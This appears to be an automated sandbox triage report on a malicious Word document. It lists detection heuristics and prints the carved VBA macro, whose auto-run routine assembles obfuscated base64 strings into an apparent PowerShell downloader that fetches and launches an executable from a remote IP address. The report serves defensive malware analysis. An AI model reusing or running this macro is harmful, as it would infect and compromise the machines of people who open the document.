Verdict: MALICIOUS
Risk Score: 224

Malware Insights

MITRE ATT&CK: T1059.005 (Command and Scripting Interpreter: Visual Basic)
The sample is a Microsoft Office document containing a VBA macro. The macro is triggered by the Document_Open event and utilizes the Shell() function, indicating an attempt to execute arbitrary commands. The presence of obfuscated code and a ClamAV detection signature for 'Doc.Macro.Obfuscation' suggests a malicious downloader or dropper.
Heuristics (7)

- ClamAV: Doc.Macro.Obfuscation-6332451-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Macro.Obfuscation-6332451-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 | Detection |
|---|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 19276 bytes | cff55cd9d78a573e5e99605e8a5e9108a5bb554c8defb4e9a88ee35219520f32 | ClamAV: No threats found. Obfuscation or payload: likely (carved artifact contains 2 long base64-like blob(s)). |

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Document_Open()
If Len("hs41m6zP") <> 221 Then
' fMxdYz2b
Else
' hR4UAN3
MsgBox "vIm0t", 31, "ZBDAd8ET"
End If
Dim xK9wTGRA
xK9wTGRA = Array("KNCegz5Aw", "lPASKf")
daircBL0 = xK9wTGRA(0)
v7yGER = "5ZVhza2QyVmlZMnhwWlc1MExrUnZkMjVzYjJGa1JtbHNaU2drYlhsMWNtd3VWRzlUZEhKcGJtY29LU3dnSkhCaGRHZ3"
aSKla = "BPMU4wWVhKMExWQnliMk5sYzNNZ0pIQmhkR2c3WW5KbFlXczdmV05oZEdOb2UzMTk="
Dim bU23xtYb
bU23xtYb = Array("lKBDC")
nXJ5Y0 = bU23xtYb(0)
Dim JRmGES4DL
JRmGES4DL = Array("tWkM5", "Z62wZ")
rzUAF72iO = JRmGES4DL(1)
Dim RG0TV5Kqn
RG0TV5Kqn = v7yGER & aSKla
mJa056X = "WTIxa0lDOXJJSE5sZENCZlVFOVhSVkk5Y0c5M1pYSW1KaUJ6WlhRZ1gxTklSVXhNUFhOb1pXeHNKaVlnWTJGc2JDQWxYMUJQVjBWU0pTVmZVMGhGVEV3bElDUjNaV0pqYkdsbGJuUWdQU0J1WlhjdGIySnFaV04wSUZONWMzUmxiUzVPWlhRdVYyVmlRMnhwWlc1ME95UnRlWFZ5YkhNZ1BTQW5hSFIwY0Rvdkx6RTVN"
aIb0RYJ = "UzQ1Tmk0eU5Ea3VNVEF4TDJ0bGVTNXpheWN1VTNCc2FYUW9KeXduS1Rza2NHRjBhQ0E5SUNSbGJuWTZkR1Z0Y0NBcklDZGNmblJ0Y0M1bGVHVW5PMlp2Y21WaFkyZ29KRzE1ZFhKc0lHbHVJQ1J0ZVhWeWJITXBlM1J"
If Len("KZgPOEL") <> 251 Then
' EpyTqos7
Else
' EvLUJp
MsgBox "nZzcMQ", 60, "ifIBEwAu"
End If
Dim wcS0YwBU
wcS0YwBU = Array("QXz6AHZM9", "FTpBMhLe", "X8yJED4")
idxVB = wcS0YwBU(2)
Dim z4apeY
z4apeY = mJa056X & aIb0RYJ
Dim FvgkYS
FvgkYS = Array("xjiFwAp9c")
yALKR4Q = FvgkYS(0)
Ad1qHY = z4apeY & RG0TV5Kqn
Dim PaduYn62
PaduYn62 = Array("HJLYh", "ycB5um")
IKI1ls = PaduYn62(1)
If Len("T2TxU7fd") <> 224 Then
' v2C5KAMO
Else
' XscuPjkE
MsgBox "tlupn8B", 12, "Oogju5rOD"
End If
If Len("GxHEAN") <> 236 Then
' ftRKg
Else
' DasSPiVZ
MsgBox "HPxZOV", 36, "vEdwqRgj"
End If
Dim EbQHuiSh
EbQHuiSh = Array("nZXUPRhM")
WX9wBlRA = EbQHuiSh(0)
Dim QSuOv6G
QSuOv6G = Array("k24KqNm")
Pe8O4 = QSuOv6G(0)
Dim VMUOJIEqn
VMUOJIEqn = Array("vDZa458", "FfRQi")
EVByfAKg = VMUOJIEqn(0)
If Len("MEoh5") <> 218 Then
' gFUDm0
Else
' ZhO3Io
MsgBox "E9s6Q0cH", 30, "C5LN9X8g"
End If
sex Ad1qHY
End Sub
Attribute VB_Name = "WqDivFh"
Sub sex(wra8KUL)
Dim rWxQwBHAd
rWxQwBHAd = Array("AXG4aY", "l9bMza")
FJg2TFKXR = rWxQwBHAd(1)
Dim lJg0n5
lJg0n5 = Array("pDCYZztj", "N8chDR57Y")
Pjn9phx6 = lJg0n5(0)
If Len("GqWEC8jxr") <> 145 Then
' iLC6AZv8
Else
' mazqZG
MsgBox "r5MTUpe", 61, "dgvGsq7Mn"
End If
Dim UXDyUWb
UXDyUWb = Array("ZmfzTI", "aCNBy6c")
svauP07 = UXDyUWb(1)
Dim UTm8XPe4M
UTm8XPe4M = Array("jOLsB", "e739s1SR8", "mtW4zAj")
tBpWKmX = UTm8XPe4M(0)
Dim XoyJR1XfN
XoyJR1XfN = Array("ULsAqt4", "JWTSk")
LWK1ncyN = XoyJR1XfN(0)
Dim Umvj7p
Umvj7p = Array("feEQTyRx")
EHCumV47B = Umvj7p(0)
Dim RHAln6
RHAln6 = Array("hUve8", "g8pnKLx", "XOzCxTMU")
H45fok2 = RHAln6(1)
Dim eyI1oYxJ
eyI1oYxJ = Array("hIjzT", "sYLulAKw")
us6Lo7 = eyI1oYxJ(1)
Dim O5CqmVKd
O5CqmVKd = Array("wywON8V2", "FuWi2O")
xwglNU = O5CqmVKd(1)
Dim Ad2qrKTc
Ad2qrKTc = Array("Pe36BuV", "qK1ZJIi")
eQdC1KGtm = Ad2qrKTc(0)
Dim ZcE3IWe7
ZcE3IWe7 = Array("opdOjw0ne")
ayaTrxP0f = ZcE3IWe7(0)
Dim xwKuEUVo
xwKuEUVo = Array("jwinf50", "usn2WgkNl", "gMXiDT4u")
y6t3U = xwKuEUVo(1)
Dim MSfr5pj3
MSfr5pj3 = Array("s3uxSK2UF", "M6nJQOf", "jwXfMTi")
buxMrRB = MSfr5pj3(2)
Dim OOaRy
OOaRy = Array("RbQnu", "fe1xJ7SIG", "tbjHSm1")
hVpbYO = OOaRy(0)
Dim RSlJqzuF
RSlJqzuF = Array("RCOepYjx", "bC1wAU2jp", "vNwf63")
pYIVo = RSlJqzuF(0)
Dim KUfc8JT
KUfc8JT = Array("T57sRSpu", "APpZnx", "byIpQt1")
K5My4uLAl = KUfc8JT(0)
Dim DrGHIl
DrGHIl = Array("vh576jJ", "xjFdD5Y")
GLC65 = DrGHIl(0)
Dim AvhcB
AvhcB = Array("jauHDgE9o", "SGKsz", "gZLbt")
vaWgt = AvhcB(0)
Dim svUnZ6O
svUnZ6O = Array("yIamdy3")
ND2eyRjdn = svUnZ6O(0)
Dim bO7ZJ
bO7ZJ = Array("kfOlK")
xkNJe = bO7ZJ(0)
Dim xhVi8G
xhVi8G = Array("IcgKJ", "zohSnkYJ")
BouJnS8 = xhVi8G(1)
If Len("DwTAN") <> 162 Then
' Vw6Z0FNDt
Else
' rrm2c
MsgBox "l8ODv63r", 28, "pklSRr"
End If
If Len("VQAvqG0X") <> 165 Then
... (truncated)